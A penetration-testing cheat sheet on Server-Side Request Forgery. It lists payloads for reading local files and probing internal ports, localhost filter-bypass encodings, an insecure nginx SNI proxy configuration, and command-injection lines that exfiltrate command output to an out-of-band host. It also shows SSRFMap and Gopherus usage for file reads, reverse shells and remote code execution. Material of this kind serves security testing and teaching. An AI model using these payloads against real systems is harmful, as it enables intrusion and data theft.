SSRF (Server-Side Request Forgery)

Theory

A Server-Side Request Forgery (a.k.a. SSRF) is a web vulnerability allowing attackers to make the server-side application do certain requests. This vulnerability can lead to unauthorized actions, Sensitive Information Disclosure and even RCE (Remote Code Execution).

Practice

Testers need to find input vectors and fields that could be used for publishing or importing data from a URL (e.g. GET and POST parameters).

With http://some.website/index.php?url=https://someother.website/index.php, and url being the vulnerable parameter, the following basic payloads can help a tester fetch content of files, scan ports, access filtered resources and so on.

file://PATH/TO/FILE
http://127.0.0.1:80/admin
http://127.0.0.1:80
http://127.0.0.1:22
ldap://127.0.0.1:389/%0astats%0aquit
dict://{attacker_url}:11111/
sftp://{attacker_url}:11111/
tftp://{attacker_url}:12346/TESTUDPPACKET

To scan for a specific range of private IP addresses (other than localhost), Use burp suite intruder that can fetch all of IP addresses in the internal network that is targeted.

Bypassing filters

In order to conduct SSRF attacks properly, there may be use cases where filters need to be bypassed

http://127.1
http://0
http:@0/
http://0.0.0.0:80
http://[::]:80/
http://[0000::1]:80/
http://2130706433 # Decimal version of localhost
http://0x7f000001/ # Hexadecimal version of localhost

Blind SSRF vulnerabilities

A blind SSRF vulnerability is a type of vulnerability that arises when an application makes a request to an external resource using user-supplied input, but the application does not return the response to the user.

It can be achieved to gain full RCE (Remote Command Execution).

In order to identify a potential SSRF vulnerability and exploit, multiple tools can be used to pingback the request and see the response.

SSRF via SNI data from certificate

The configuration below is insecure and allows to connect to an arbitrary backend, since the SNI field value is used directly as the address of the backend.

stream {
    server {
        listen 443; 
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;       
        ssl_preread on;
    }
}

With this insecure configuration, it is possible to exploit the SSRF vulnerability simply by specifying the desired IP or domain name in the SNI field. For example, the following command would force the server to connect to internal.host.com:

openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlfbash

SSRF with Command Injection

It is possible to use SSRF that return the command output inside an out of band connection as follows.

url=http://zad8nb8tb7dst2yohw0br7rr6ich07ow.oastify.com?`whoami`
User-Agent: () { :; }; /bin/nslookup $(whoami).zad8nb8tb7dst2yohw0br7rr6ich07ow.oastify.com

# using SSRFMap
python3 ssrfmap.py -r data/request.txt -p url -m readfiles

# using Gopherus
gopherus --exploit mysql # It only asks username of the MySQL user
	 --exploit postgresql # It only asks username of the Postgres user and database name
	 --exploit fastcgi # It only asks for a file which must be present in the victim system(preferable .php file)
	 --exploit redis # Get a reverse or php shell to overwrite the file in the system
	 --exploit zabbix # If port 10050 is open and EnableRemoteCommands = 1, then it is possible to run shell command
	 --exploit pymemcache # Python deserialization issue that lead to RCE
	 --exploit rbmemcache # Ruby deserialization issue that lead to RCE
	 --exploit phpmemcache # PHP deserialization issue that lead to RCE
	 --exploit dmpmemcache # Dump memory cache content
	 --exploit smtp # If port 25 is open and we can access it then, we can send message to anyone as victim user by generating email payload

Resources